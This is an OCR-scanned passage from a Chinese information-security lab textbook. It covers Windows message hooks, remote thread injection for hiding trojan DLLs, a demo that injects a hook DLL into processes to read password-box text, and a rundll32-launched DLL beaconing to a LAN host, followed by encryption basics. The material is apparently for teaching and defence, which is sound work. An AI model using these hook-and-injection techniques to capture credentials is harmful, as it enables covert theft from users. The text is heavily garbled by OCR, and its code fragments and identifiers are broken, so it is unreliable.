在 没有 到 达 目 的 窗口 前 ,钩子 程序 就 先 捕获 该 消息 , 即 钧 子 函 数 先 得 到 控制 权 。 这 时 钧 子 函 
数 既 可 以 加 工 处 理 ( 改 变 ) 该 消息 ,也 可 以 不 作 处 理 而 继续 传递 该 消息 ,还 可 以 强制 结束 消息 
的 传递 。Windows 提供 以 下 3 个 钧 子 函数 。 

(1) 设置 钧 子 : SetWindowsHookEx。 

(2) RIT: UnhookWindowsHookEx。 

(3) 继续 钓 子 : CallNextHookEx。 
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【 例 8-2] 拦截 鼠标 消息 ,获取 窗口 标题 的 DLL 编码 如 下 。 


# pragma data_seg("mydata") // 建 立 一 个 名 为 "mydata" 的 数据 段 并 定义 共享 数据 
HWND glhPrevTarWnd = NULL; // 上 次 鼠标 所 指 的 窗口 句柄 
HWND glhDisplayWnd = NULL; // 显 示 目 标 窗口 标题 编辑 框 的 句柄 
HHOOK glhHook = NULL; // 安 装 的 鼠标 钩子 句柄 
HHOOK glhHook key= NULL; // 安 装 的 键盘 钩子 句柄 
HINSTANCE glhInstance = NULL; //DLL 实例 句柄 


# pragma data seg() 
# pragma comment (linker, "/section:mydata, rws") 


glhHook = SetWindowsHookEx(WH_MOUSE, MouseProc, glhInstance, 0) ; // 安 装 鼠 标 钩子 
// 参 数 MouseProc 是 回调 函数 指针 , 当 鼠 标 消 息 拦截 后 ,由 函数 MouseProc 过 滤 处 理 ， 

// 处 理 完 后 调用 CallNextHookEx 继续 传递 消息 ,否则 该 消息 不 再 传递 ,声明 如 下 : 
LRESULT WINAPI MouseProc( int nCode, WPARAM wparam, LPARAM 1paran) ; 
UnhookWindowsHookEx(glhHook) ; // 释 放 鼠 标 钩子 


3) 远程 线程 注入 

通常 情况 下 ,各 个 进程 的 内 存 空 间 是 不 可 以 相互 访问 的 ,这 也 是 为 程序 能 够 稳定 运行 打 
下 基础 ,这 个 访问 限制 让 所 有 进程 之 间 互 相 独 立 ,任何 一 个 非 系 统 关 键 进程 发 生 崩 溃 时 都 不 
会 影响 到 其 他 内 存 空 间 里 的 进程 执行 ,从 而 使 NT 架构 的 稳定 性 远 远 高 于 Windows 9x 架 
构 。 但 是 在 一 些 特定 的 场合 里 ,必须 让 进程 之 间 可 以 互相 访问 和 管理 ,这 就 是 “远程 线程 注 
入 ”技术 的 初衷 ,这 个 技术 实现 了 进程 之 间 的 跨 内 存 空间 访问 ,其 核心 是 产生 一 个 特殊 的 线 
程 , 这 个 线程 能 够 将 一 段 执行 代码 连接 到 另 一 个 进程 所 处 的 内 存 空 间 里 ,作为 另 一 个 进程 的 
其 中 一 个 非 核心 线程 来 运行 ,从 而 达到 交换 数据 的 目的 ,这 个 连接 的 过 程 被 称 为 “ 注 和 人 ” 
(injection) 。 远 程 线程 注入 (Remote Thread Injection) 技 术 好 比 一 棵 寄生 在 大 树 上 的 草 功 ， 
一 旦 目标 进程 被 注入 ,这 段 新 生 的 线程 就 成 为 目标 进程 的 一 部 分 代码 了 ,只 要 目标 进程 不 被 
终止 , 原 进程 无 论 是 否 还 在 运行 都 不 会 再 影响 到 执行 结果 了 。 基 本 流程 如 下 。 

Q) 把 一 个 实际 为 木马 主体 的 DLL 文件 载 入 内存。 

(2) 通过 远程 线程 注入 技术 将 其 注入 其 他 进程 的 内 存 空间 ,最 后 这 个 DLL 里 的 代码 就 
成 为 其 他 进程 的 一 部 分 ,从 而 实现 了 自身 的 隐藏 执行 。 完 成 创建 远程 线程 的 主要 函数 包括 
OpenProcess, VirtualAllocEx, WriteProcessMemory、GetProcAddress 和 CreateRemoteThread, 具 
体 参 见 (Windows 核心 编程 》。 

(3) 木马 通过 调用 Hook 机 制 ,实现 了 监视 用 户 的 输入 输出 操作 ,截取 有 用 的 资料 等 。 

这 种 木马 的 实际 执行 体 是 一 个 DLL 文件 ,由 于 Windows 系统 自身 就 包含 着 大 量 的 
DLL 文件 ,无 法 一 眼看 出 哪个 DLL 文件 不 是 系统 自 带 的 ,这 种 木马 的 隐蔽 性 比较 高 ,而 且 
它 的 执行 方式 也 更 加 隐蔽 ,这 是 由 Windows 系统 自身 特性 决定 的 。Windows 自身 就 是 大 
量 使 用 DLL 的 系统 ,许多 DLL 文件 在 启动 时 便 被 相关 的 应 用 程序 加 载 进 内 存 里 执行 了 。 

通常 情况 下 是 无 法 直接 查看 某 个 DLL 在 运行 的 ,需要 特定 的 工具 。 因 为 系统 是 把 
DLL 视 为 一 种 模块 性 质 的 执行 体 来 调用 的 , 它 内 部 只 包含 了 一 堆 以 函数 形式 输出 的 模块 ， 
也 就 是 说 每 个 DLL 都 需要 由 一 个 用 到 它 的 某 个 函数 的 exe 来 加 载 , 当 DLL 里 的 函数 执行 
完毕 后 就 会 返回 一 个 运行 结果 给 调用 它 的 exe, 然 后 DLL 模块 退出 内 存 , 结 束 这 次 执行 过 


程 ,这 就 是 标准 的 DLL 运行 周期 。 而 采用 了 远程 线程 注入 技术 的 DLL 则 不 是 这 样 , 它 们 自 
身 虽 然 也 是 导出 函数 ,但 是 它们 的 代码 是 具备 执行 逻辑 的 ,这 种 模块 就 像 一 个 普通 exe, H 
是 它 不 能 直接 由 自身 启动 ,而 是 需要 有 一 个 特殊 作用 的 程序 ( 称 为 加 载 者 ) 产 生 的 进程 把 这 
个 DLL 的 主体 函数 载 人 内 存 中 执行 ,从 而 让 它 成 为 一 个 运行 中 的 木马 程序 。 

模块 是 紧 紧 依赖 于 进程 的 ,调用 了 某 个 模块 的 进程 一 旦 退出 执行 ,其 加 载 的 DLL 模块 
也 就 被 迫 终止 了 。 但 是 在 DLL 木马 里 ,这 个 情况 是 不 会 因为 最 早 启动 的 exe 被 终止 而 发 生 
的 ,因为 它 使 用 了 远程 线程 注 和 技术 ,所 以 ,在 用 户 发 现 异常 时 ,DLL 木马 早 就 不 知道 被 注 
入 到 哪个 正常 进程 里 了 ,即使 用 户 发 现 了 这 个 木马 DLL, 也 无 法 把 它 终止 ,因为 要 关闭 它 就 
必须 在 那么 多 的 系统 进程 里 找到 被 它 注入 的 进程 ,并 将 其 终止 ,对 一 般 用 户 来 说 ,这 是 个 不 
可 能 完成 的 任务 。 

一 般 来 说 ,杀毒 软件 会 对 远程 线程 注入 的 行为 进行 拦截 并 提示 警告 ,但 一 旦 注入 成 功 ， 
木马 DLL 在 系统 进程 中 运行 起 来 , 且 木 马 DLL 的 文件 从 硬盘 上 被 删除 ,杀毒 软件 就 难以 发 
现 了 。 


5. 实践 操作 及 步骤 


1) 窗口 句柄 及 其 消息 

Spy++ (SPYXX. EXE) 提供 系 统 的 进程 .线程 .窗口 和 窗口 消息 的 图 形 视图 。 使 用 
Spy++ 可 以 执行 下 列 操作 。 

O) 显示 系统 对 象 (包括 进程 线程 和 窗口 ) 之 间 关 系 的 图 形 树 。 

(2) 搜索 指定 的 窗口 ,线程 进程 或 消息 。 

G) 查看 选 定 的 窗口 线程 .进程 或 消息 的 属性 。 

(4) 直接 从 视图 中 选择 窗口 线程 .进程 或 消息 。 

(5) 通过 鼠标 定位 ,使 用 查找 程序 工具 选择 窗口 。 

(6) 使 用 复杂 的 消息 日 志 选 择 参数 设置 消息 选项 。 

图 8-1 所 示 为 Microsoft Spy++ 主 界面 。 

Spy++ 启 动 后 显示 当前 所 有 窗口 对 象 的 信息 ,窗口 对 象 的 范围 很 广 ,不 但 包括 软件 界 
面 , 还 包括 界面 中 的 所 有 控件 ,如 标题 栏 .菜单 栏 .工具 栏 编 辑 框 \ 列 表 框 ,按钮 等 。 

选择 如 图 8-1 所 示 的 “搜索 ”菜单 下 的 “查找 窗口 " 子 菜单 后 ,显示 如 图 8-2(a) 所 示 的 “ 窗 
口 搜索 "对话 框 , 鼠 标 左 键 按 住 按钮 [ 罚 ] 不 放 , 拖 电 到 任务 栏 上 的 “开始 ?按钮 上 放 开 鼠标 , 则 
图 8-2(b) 显 示 搜 索 结 果 。 

单 击 “确定 ?按钮 后 ,弹出 如 图 8-3 所 示 的 “属性 检查 器 ”对 话 框 ,显示 的 是 任务 栏 上 的 
“开始 ”按钮 的 窗口 属性 ,包括 标题 ,句柄 、 进 程 、 线 程 、 样 式 等 。 程 序 获 取 了 “开始 ”按钮 的 窗 
口 句 柄 后 ,就 可 以 通过 函数 PostMessage 或 SendtMessage, 向 其 发 送 鼠 标 左 键 消息 ,右键 消 
息 或 关闭 消息 ,使 其 动作 ,或 通过 SetWindowLong 改变 指定 “开始 "按钮 的 属性 ,如 显示 、 隐 
藏 . 标 题 等 。 

选择 如 图 8-1 所 示 的 “监视 ”菜单 下 的 “日 志 消 息 ” 子 菜单 后 ,显示 如 图 8-4 所 示 的 “消息 
选项 ”对 话 框 ,(a) 图 显示 要 监视 窗口 的 信息 ,(b) 图 显示 要 监视 的 消息 类 型 ,实践 选择 鼠标 消 
息 ,去 掉 左 边 显示 的 WM_MOUSEMOVE( 鼠 标 移动 ;)、WM_MOUSELEAVE( 鼠 标 离开 )、 
WM_SETCURSOR( 鼠 标 焦点 ) 这 3 个 鼠标 消息 ,因为 这 几 个 消息 太 多 了 。 
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句柄 ; MK_LBUTTON 是 按 下 鼠标 左 键 标志 ,用 于 程序 处 理 鼠 标 消息 时 ,通过 检查 该 标志 
值 来 确定 鼠标 键 的 状态 。xPos 和 yPos 是 鼠标 单 击 位 置 .该 位 置 是 相对 “开始 ”按钮 的 窗口 
(左上 角 的 坐标 为 (0,0)) 而 得 。 


利用 Explorer Suite 中 的 Task Explorer 工具 控制 任务 栏 上 的 “开始 ”按钮 (适用 于 所 有 


窗口 ) 的 显示 、 隐 藏 有 效 ( 接 受 并 响应 消息 ) 无效 (忽视 消息 ) 和 关闭 。 启 动 Task Explorer. 
exe, 选 择 菜 单 Viewers, 显 示 如 图 8-6 所 示 的 对 话 框 。 


如 图 8-6 所 示 ,在 “开始 "上 的 鼠标 右键 菜单 中 , 子 菜单 的 Visible 使 “开始 ?按钮 的 窗口 
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tooltips_class32 - (Invisible - Enabled) 
Shell_Traywnd - (Visible - Enabled) 


dowWindowClass - (Invisible - Enabled) 
isible - Enabled) 
) 


BaseBar - (Invisible - Enabled) 
MozlllaDropShadowWindowclass - (Invisible - Enabled) 
MozilaDropShadowWindowClass - (Invisible - Enabled) 
MozilaDropShadowWindowClass - (Invisible - Enabled) 
MozillaDropShadowWindowClass - (Invisible - Enabled) 
MozilaWindowClass - (Invisible - Enabled) 


00000004000 e e M00000000 


图 8-6 Windows Viewer 对 话 框 


显示 和 隐藏 ， Enabled 使 “开始 ?按钮 的 窗口 有 效 和 无 效 ; Close 关闭 “开始 ”按钮 的 窗口 。 如 
果 要 再 次 显示 , 则 需要 注销 当前 账户 或 重启 计算 机 。 

“开始 ”窗口 的 父 窗口 是 Shell_TrayWnd( 任 务 栏 的 类 名 ) ,也 可 以 使 其 显示 \ 隐 藏 . 响 应 \ 
不 响应 等 。 

3) DLL 注入 实践 

运行 MouseDemo. exe 将 MouseHook. dll 注入 到 各 个 进程 中 ,以 获取 窗口 的 标题 ,编辑 
框 和 密码 框 中 的 文字 。 启 动 程序 MouseDemo. exe 后 ,杀毒 软件 会 弹出 警告 ,选择 “允许 ”， 
则 MouseDemo. exe 会 将 MouseHook. dll 注入 系统 的 各 个 进程 中 ,MouseHook. dll 会 拦截 
鼠标 消息 ,并 判断 接受 鼠标 消息 窗口 的 属性 ,如 果 是 标题 ,编辑 框 和 密码 框 则 提出 文字 信息 
返回 给 MouseDemo 中 的 编辑 框 显 示 , 如 图 8-7 所 示 。 


(b) 


图 8-7 MouseDemo 运行 界面 


图 8-7(a) 显 示 当 鼠标 移动 到 记事 本 的 标题 时 ,提取 标题 信息 “新 建文 本 文档 . txt- 记 事 
本 ”并 显示 ,图 8-7(b) 显 示 当 鼠标 移动 记事 本 的 编辑 区 时 ,提取 编辑 区 的 文本 “12334”。 随 
着 鼠标 移动 其 他 窗口 ,MouseDemo 中 编辑 框 的 显示 随 之 变化 。 

利用 Dependency Walker 工具 打开 MouseDemo. exe 文件 ,如 图 8-8 所 示 。 

在 图 8-8 中 ,左边 显示 有 MOUSE HOOK. DLL 文件 名 ,表示 MouseDemo. exe 运行 依 
$ñ MouseHook. dll 模块 。 右 边 显 示 MouseHook. dll 输出 的 供 调用 者 调用 的 函数 列表 ,在 
MouseHook. dll 的 源 代 码 中 如 下 定义 。 


class AFX_EXT_CLASS MouseHookl : public CObject{ 
public: 
MouseHook1 ( ) ; // 类 构造 函数 
virtual ~MouseHook1 ( ) ; // 类 析 构 函数 
BOOL StartHook( HWND hWnd) ; // 安 装 钩子 函数 
BOOL StartHook key() ; // 安 装 钩子 函数 
BOOL StopHook( ) ; //T3R4 f R 
}; 


上 面 代码 实现 MouseHook1 类 定义 ,包含 5 个 类 成 员 函 数 。 其 中 AFX_EXT_CLASS 
是 一 个 宏 , 用 于 导出 类 MouseHook1, 类 名 、 类 构造 函数 和 类 析 构 函数 虽然 同名 ,但 编译 时 会 
自动 处 理 而 不 会 混淆 ,因此 在 MouseHook. dll 导出 表 中 看 到 修改 后 的 MouseHookl 名 。 


Dependency Walker - [MouseDemo. exe 
me File Edit View Window Help 


| 2| | alg) 色目 四 | w! 
F C MOUSEDENO. EXE 
r C42. DLL (0x0000) ??OMouseHook1@BQAE@KI 
国 MSYCRT. DLL (0x0001) ??1MouseHook 100UAEGKZ 
[S] KERNEL32. DLL (0x0003) ?StartHook@NouzeHookl@8QAEHPAUHWND__@@Z Not Bound 
a GDI32. DLL (0x0004) ?StopHook@MouseHook1@@QAEHXZ Not Bound 
USER32. DLL 
由 国 MSVCRT. DLL 
由 国 KERNEL32. DLL 
由 国 USER32. DLL 


{0x0001) (0x0000) ??0MouseHook1@BQAE@KZ Ox000011B0 
{0x0002) (0x0001)  ??1MouseHooklGBUAEGXZ 0x00001230 
《0x0003) (Dx0002) ??_7MouseHook1@0865@ 0x00002068 
(0x0004) (0x0003) ?StartHook@MouseHook1@@QAEHPAUHWND__@0@Z7 0x00001280 
(0x0005) (0x0004) ?StopHook@MouseHook1@8QAEHXZ 0x000012E0 


02/00/11 — 9:34p 

09/25/12 12:43p 

09/25/12 12:52p 0x10000000| 1. 0. 
ASYCRT.DIT [na/ni/n7 12:nna a, Intal xAA GI nx77PFnnnn| 7. n l 
Ce | 


[For Help, press Fl 


图 8-8 用 Dependency Walker 打开 MouseDemo. exe 文件 


利用 Explorer Suite 中 的 Task Explorer 工具 .可 以 查看 MouseHook. dll 已 经 被 注入 
到 多 个 进程 中 。 启 动 Task Explorer. exe, 其 窗口 分 为 上 下 两 栏 ,上 栏 显示 当前 系统 中 运行 
的 进程 ,下 栏 显示 所 选 进程 所 调用 的 模块 。 选 择 NOTEPAD 则 下 栏 显示 其 调用 的 所 有 模 
块 ,其 中 MouseHook. dll 就 是 注入 的 模块 ,挂钩 NOTEPAD 的 鼠标 消息 如 图 8-9 所 示 ,其 他 
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的 进程 也 有 MouseHook. dl。 实 践 中 请 比较 启动 MouseDemo. exe 前 后 的 各 个 进程 中 的 模 


块 列表 。 


` Task Explorer 


File Viewers 


? 


1d 
00000080 
000003CC 
000003C8 
00000344 


.... 00000084 


A atannwrannar 


000016E0 
00000D60 
00001780 
00000770 
nnnnn4in 


00006000 
00040000 
00088000 
00005000 
00054000 
00013000 
0002E000 
nnnnannn 


Path 

G:\Program Fies\ArcGIS\License10. 1\bin\lmgrd.exe 
G:\Program Fies\ArcGIS\ License 10. 1\binilmgrd.exe 
CHWWINDOWSWsystem32Vsass,exe 


C:\Program Files\Common Files\Microsoft Shared... 


C:\Program FiesiBonjourimDNSResponder.exe 


ES 通 识 课程 \ 信 息 安全 防护 V2012ttoolsyMouseDe… 


C:\WINDOWS}system32\mspaint,exe 
C:WINDOWSUsystem32WWOTEPAD.EXE 
C:WINDOwSlsystem32invsvc32.exe 
FilPrnnram Finsipininior4VSAdinintannwrannmr 


Module 
ierti 

图 ws2_32 

较 wszhELP 

国 NETaP132 
mscr 

图 QvodwebBase 


Address 


616E0000 


oolEC000 
00017000 
00008000 
00055000 
0004C000 
0006E000 
0002E000 


Path 
Ci\WINDOWS}system32jertutil.di 
C:AWINDOWS}system32\W52_32.di 
Ci\WINDOWS}system32\WS2HELP. di 
Ci\WINDOWS}system32\NETAPI32, dil 
Ci\WINDOWS}system32\MSCTF.dl 

E:\Program Files\QvodPlayer\QvodwebBase\1.0.0... 


C'WINDOWSIsystem32 MFC42 


图 8-9 Task Explorer H @ H 


Description ~ 
Run time utilty for Inte 
Windows Socket 2.0 32 
Windows Socket 2.0 He 
Net Win32 API DLL 
MSCTF Server DLL 
QvodWebBase Dynami 
Microsoft Text Frame V 


MFC Language Specific 
` 


> 


TLR Bbk Ag f... n L Rak Ei okk BEIE k e ww Wk HL A 3336 09 yuk. A 


虚拟 键盘 可 以 有 效 地 防止 这 类 钩子 的 拦截 。 在 命令 行 输入 “osk”， 


虚拟 键盘 。 


则 弹出 如 图 8-10 所 示 的 


图 8-10 ”虚拟 键盘 


但 恶意 软件 (截屏 类 的 键盘 记录 程序 ) 为 对 付 虚拟 键盘 ,拦截 用 户 在 虚拟 键盘 上 的 按 
击 , 即 当 按 下 一 个 键 时 ,恶意 程序 就 截 一 次 屏幕 ,这 样 可 以 清楚 地 看 到 用 户 输入 的 密码 


信息 。 


4) DLL 网 络 连接 实践 

用 动态 链接 库 net. dll 导出 SeviceMain 函数 。net. dll 的 导出 信息 如 图 8-11 所 示 。 

在 SeviceMain 函数 中 创建 TCP 流 套 接 字 Scoket, 发 起 网 络 连 接 , 作 为 网 络 通 信和 的 客户 
端 向 IP 地 址 为 192. 168. 1. 118 的 计算 机 的 80 端口 发 送 连接 请 求 包 ,192. 168. 1. 118 的 计 
算 机 监听 80 端口 ,说明 该 计算 机 开启 了 Web 服务 。 


打开 cmd 命令 终 


端 ,用 cd 命令 切换 目录 到 net. dll 所 在 的 文件 夹 ,输入 如 图 8-12 所 示 
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的 命令 并 回 车 。 


Dependency Walker - net. dll 
File Edit View Window Help 
| e| al ae Sm] 

net. dll 


a C NET. DLL Ordinal ` Entry Point 
日 国 KERNEL32. 


国 | KERNEL32.DLL 

国 NTDLL.DLL 

国 USER32.DLL 
国 KERNEL32. DLL Ordinal Hint | Function Entry Point 


国 NTDLL. DLL 国 1 (0x0001) 0 (Ox0000) Serviceltain 0x00001520 
= D) ADVAPI32. DLL 
P KVERNET 39 DT 
For Help, press Fl 


图 8-11 net. dll 信息 


图 8-12 rundll32 命令 


该 命令 是 运行 rundll32. exe, 由 其 加 载 net. dll 模块 到 内 存 , 并 调用 和 执行 ServiceMain 

函数 ,开启 网 络 连接 。 通 过 命令 netstat、360 流量 防火 墙 和 procexp 等 工具 查看 网 络 连接 。 
图 8-13 所 示 为 命令 行 netstat -an -o HJ 88 H 端口 为 10907 , 远 端 通信 端 

口 为 80,SYN_SENT 表示 发 送 连接 请 求 包 的 标志 ,8208 是 rundll32. exe 的 进程 PID( 通 过 


任务 管理 器 查看 )。 


ESTABLISHED 
ESTABLISHED 


E_WAIT 
CLOSE_WRIT 
LISTENING 
LISTENING 


图 8-13 netstat 命令 窗口 


图 8-14 所 示 为 360 流量 防火 墙 显示 当前 系统 中 的 网 络 信息 ,可 以 看 到 rundl132. exe 发 
起 的 网 络 连接 信息 , 比 netstat 命令 信息 更 清楚 些 。 


360 泳 量 防火 培 


A #% E *%* 


管理 网 速 网 络 体检 保护 网 违 局域网 防护 36 小 助手 


当前 有 22 个 程序 已 连接 或 尝试 连接 网 络 ， 共 建立 114 个 连接 , 暂 未 发 现 可 大 程 序 存在 。 
看 网 页 、 下 载 、 禾 天 、 玩 网 络 游戏 时 会 建立 网 络 连 接 ,用 来 完成 与 对 方 的 联系 和 数据 传送 。 您 可 以 查看 和 管理 连接 ， 提 高 同 络 安全 性 。 


进程 安全 等 级 “协议 本 地 PP 本 地 端口 REP 目标 端口 ”目标 IP 妇 属地 状态 Ea 
E System Ide Proc.. 安全 — TCP 192.168.0.103 — 12431 183.60.15.158 80 TROR. 已 关闭 & 
E System Ide Proc.. e — TCP 192.168.0.103 12432 183.60.15.158 80 TRAR. 已 关闭 a 
IÆ System Ide Proc... 安全 TCP 192.168.0.103 12448 1194768106 80 已 关闭 8 
国 rundls2.exe 安全 TP 192,168.0,103 12452 192,168.1.118 s0 同步 发 送 
国 36onetmaneme 安全 UDP 0000 10938 0.0.0.0 o 8 
[9 360rp.exe 安全 UDP 0000 10925 0.0.0.0 o Q 
@ 360tray.exe 安全 UOP 0000 3600 0.0.0.0 o b. 


图 8-14 360 流量 防火 墙 


图 8-15 所 示 为 启动 procexp. exe 的 界面 ,界面 的 左边 栏 以 树 形 结构 显示 当前 系统 中 的 
进程 , 树 形 层次 体现 各 个 进程 的 父子 关系 。RUNDLL32. exe 的 父 进程 是 CMD. EXE, mi 
CMD. EXE 的 父 进程 是 EXPLORER. EXE, 鼠 标 右 击 RUNDLL32. exe, 选 择 右键 菜单 的 
Properties 子 菜单 ,弹出 如 图 8-15 所 示 的 属性 框 , 选 择 TCP/IP 选项 卡 , 可 以 看 到 rundll32 
. exe 每 隔 一 段 时 间 就 发 送 一 次 http 网 络 连接 请 求 包 ,如 果 不 成 功 则 隔 一 定时 间 再 发 ,如 此 
循环 ,直至 连接 成 功 为 止 。 


Sysinternals: www. sysinternals. com [2( 


File Options Yiew Process Find lsers Help 


i (a më mio m x à @ 


Process PID! CPU Private... | Working... | Description 


—Jšzsten Idle Process s — 
| B RUNDLL32. EXE:8208 Properties [- [|x] 


日 刁 sste 
日 国 sxss. exe Image Performance || Performance Graph | DiskandNetwork | 
CsRss. EXE Threads TCP/IP Security || Environment || Strings | 


interrupts 
S fB winloron eze 


J Besolve addresses 


Remote Address State 


8-15 RUNDLL32. EXE 的 TCP/IP 属性 框 


6. 思考 题 
Windows 为 什么 提供 消息 钧 子 机 制 和 远程 线程 注入 技术 ? 请 分 析 利 弊 。 


1. 实践 目的 


了 解 加 密 技术 ,掌握 个 人 数据 保护 以 及 数据 加 密 、 安 全 删除 和 恢复 
的 方法 。 


2. 实践 环境 


(1) ë À Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 

(2) 实践 工具 : MD5 效 验 工具 ,Eraser 安全 擦 除 工 具 , EasyRecovery, 
TrueCrypt 等 。 


3. 名 词 解释 


(1) 加 密 技 术 : 利用 技术 手段 把 重要 数据 变 为 乱码 (加 密 ) 传 送 ,到 
达 目 的 地 后 再 用 相同 或 不 同 的 手段 还 原 ( 解 密 )。 

(2) 对 称 加 密 : 采用 了 对 称 密码 编码 技术 , 它 的 特点 是 文件 加 密 和 
解密 使 用 相同 的 密 钥 , 即 加 密 密 钥 也 可 以 用 作 解 密 密 钥 ,这 种 方法 在 密 
码 学 中 叫做 对 称 加 密 算法 。 

(3) 非 对 称 加 密 : 采用 两 个 密 钥 , 即 公开 密 钥 (publickey) 和 私有 密 
钥 (privatekey) 。 公 开 密 钥 与 私有 密 钥 是 一 对 ,如 果 用 公开 密 钥 对 数据 
进行 加 密 , 只 有 用 对 应 的 私有 密 钥 才能 解密 ; 如 果 用 私有 密 钥 对 数据 进 
行 加 密 ,那么 只 有 用 对 应 的 公开 密 钥 才 能 解密 。 因 为 加 密 和 解密 使 用 的 
是 两 个 不 同 的 密 钥 。 

(4) 消息 摘要 : 又 称 为 数字 摘要 (Digital Digest) 。 它 是 一 个 唯一 对 
应 一 个 消息 或 文本 的 固定 长 度 的 值 , 由 一 个 单 向 Hash 加 密 函 数 对 消息 
进行 作用 而 产生 。 如 果 消 息 在 途中 改变 了 , 则 接收 者 通过 对 收 到 消息 的 
新 产生 的 摘要 与 原 摘 要 比较 , 即 可 知道 消息 是 否 被 改变 了 。 因 此 消息 摘 
要 保证 了 消息 的 完整 性 。 

O 数字 签名 : 又 称 公 钥 数 字 签名 .电子 签 章 , 用 于 鉴别 数字 信息 的 
方法 ,是 非 对 称 密 钥 加 密 技术 与 数字 摘要 技术 的 应 用 。 

(6) NTFS(New Technology File System): 是 Windows NT 操作 环 
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境 和 Windows NT 高 级 服务 器 网 络 操 作 系 统 环境 的 文件 系统 。 提 供 长 文件 名 、 数 据 保护 和 
恢复 ,并 通过 目录 和 文件 许可 实现 安全 性 。 

(7) 虚拟 磁盘 : 在 本 地 计算 机 里 面 虚拟 出 一 个 远程 计算 机 里 面 的 磁盘 ,感觉 像 是 在 本 
机 上 的 硬盘 一 样 。 


4. 预备 知识 


1) 加 密 及 其 算法 

加 密 技术 包括 两 个 元 素 : 算法 和 密 钥 。 算 法 是 将 普通 文本 (或 者 可 以 理解 的 信息 ) 与 一 
串 数 字 ( 密 钥 ) 相 结合 ,产生 不 可 理解 的 密 文 的 步骤 , 密 钥 是 用 来 对 数据 进行 编码 和 解码 的 一 
种 算法 。 常 见 加 密 算法 有 : 

(1) DES(Data Encryption Standard) : 对 称 算法 ,数据 加 密 标准 ,速度 较 快 ,适用 于 加 密 
大 量 数据 的 场合 。 

(2) 3DES(Triple DES) : 是 基于 DES 的 对 称 算法 ,对 一 块 数据 用 3 个 不 同 的 密 钥 进行 
3 次 加 密 ,强度 更 高 。 

(3) RC2 和 RC4: 对 称 算法 ,用 变 长 密 钥 对 大 量 数据 进行 加 密 , 比 DES 快 。 

(4) IDEA(International Data Encryption Algorithm) : 国际 数据 加 密 算 法 ,使 用 128 位 
密 钥 提供 非常 强 的 安全 性 。 

(5) RSA: 是 一 种 非 对 称 密码 算法 ,该 算法 需要 一 对 密 钥 ,使 用 其 中 一 个 加 密 , 则 需要 
用 另 一 个 才能 解密 。 

(6) AES(Advanced Encryption Standard) : 高 级 加 密 标准 ,对 称 算法 ,是 下 一 代 的 加 密 
算法 标准 ,速度 快 ,安全 级 别 高 。 

(7) BLOWFISH: 使 用 变 长 的 密 钥 ,长 度 可 达 448 位 ,运行 速度 很 快 ,是 一 个 容易 使 用 
的 文件 和 文件 夹 加 密 算法 。 

数据 摘要 算法 是 密码 学 算法 中 非常 重要 的 一 个 分 支 , 它 通过 对 所 有 数据 提取 指纹 信息 
以 实现 数据 签名 ,数据 完整 性 校 验 等 功能 ,由 于 其 不 可 逆 性 ,有 时 候 会 被 用 作 敏感 信息 的 加 
密 。 数 据 摘要 算法 也 被 称 为 哈 希 (Hash) 算 法 或 散 列 算法 。 常 见 算法 有 : 

(1) CRC32(Cyclic Redundancy Check); 循环 宛 余 校 验算 法 ,产生 一 个 4 字 节 (32 fu) 
的 校 验 值 ,一 般 是 以 8 位 十 六 进 制 数 表 示 , 如 FA 12 CD 45 等 。CRC32 算法 的 优点 在 于 简 
便 、 速 度 快 ,常用 于 TCP/IP 通信 和 包 的 纠 错 ,在 WinRAR、WinZIP 等 软件 中 ,也 是 以 CRC32 
作为 文件 校 验 算法 的 。 

(2) MD5(Message-Digest Algorithm 5): 消息 摘要 算法 ,用 于 数据 完整 性 校 验 、 数 据 
(消息 ) 摘 要 数据 加 密 等 ,软件 公司 或 开源 组 织 常用 MD5 来 校 验 软件 数据 的 完整 性 ,也 用 
于 用 户 密 码 加 密 和 计算 机 犯罪 中 数据 取证 等 。 举 例如 下 ,图 9-1(a) 中 文件 1. txt 中 包含 7 
个 “1”( 字 符 1 的 ASCLL 码 值 为 31) ,图 9-1(b) 中 文件 1. txt 中 包含 6 个 “1” 和 一 个 “0”( 字 
符 0 的 ASCLL 码 值 为 30) .也 就 是 从 图 (a) 到 图 (b) 的 内 容 变化 是 一 个 bit 的 二 进 制 值 由 1 
变 为 0, 而 它们 的 MD5 值 却 完全 不 一 样 。 

(3) SHA(Secure Hash Algorithm); 是 由 美国 国家 标准 技术 研究 院 (NIST) 制 定 的 。 
SHA 系列 算法 的 摘要 长 度 分 别 为 : SHA 为 20 字 节 (160 位 ),SHA256 为 32 字 节 (256 位 )， 
SHA384 为 48 字 节 (384 位 ),SHA512 为 64 字 节 (512 位 )。 其 运算 速度 与 MD5 相 比 ,也 相 
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对 较 慢 。 

(4) RIPEMD 算法 : 在 MD5 缺陷 分 析 的 基础 上 ,于 1996 年 提出 来 的 ,有 4 个 标准 分 别 
为 128、160、256 和 320, 其 对 应 输出 长 度 分 别 为 16 字 节 、20 字 节 、32 字 节 和 40 字 节 。 

2) 数字 证 书 

数字 证 书 就 是 Internet 通信 中 标志 通信 各 方 身份 信息 的 一 串 数字 ,提供 了 一 种 在 
Internet 上 验证 通信 实体 身份 的 方式 ,其 作用 类 似 于 司机 的 驾驶 执照 或 日 常生 活 中 的 
身份 证 ,由 一 个 证 书 授权 (Certificate Authority) 中 心 发 行 ,在 网 上 用 它 来 识别 对 方 的 
身份 。 

数字 证 书 是 一 个 经 证 书 授权 中 心 数字 签名 的 包含 公开 密 钥 拥 有 者 信息 以 及 公开 密 钥 的 
文件 。 最 简单 的 证 书包 含 一 个 公开 密 钥 、 名 称 以 及 证 书 授权 中 心 的 数字 签名 ,如 图 9-2 
所 示 。 


图 9-2 数字 证 书 


数字 证 书包 含 确认 证 书 的 拥有 者 Dana Evan、 颁 证 机 构 名 称 VeriSign WEBA XORI, 
序列 号 、 公 钥 数 值 等 信息 。 可 用 于 发 送 安 全 电子 邮件 ,访问 安全 站 点 、 网 上 证 券 交 易 、 网 上 招 
标 采购 、 网 上 办 公 、 网 上 保险 、 网 上 税务 、 网 上 签约 和 网 上 银行 等 安全 电子 事务 处 理 和 安全 电 
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子 交易 活动 。 打 开 IE 浏览 器 “工具 ”>“Internet 选项 ”>“ 内 容 ” 选 项 卡 习 “证书” 按钮 ,可 以 
查看 到 本 机 上 的 所 有 数字 证 书 , 如 图 9-3 所 示 。 


详细 信息 | 证 书 路 径 


EJ usas 


Aministrator — Administrator 区 用语 引荐 人 竺 ' WEUERE 
ËEZJpO_ROT_TRUST_F... DO_NOT_TRUST Fid. 
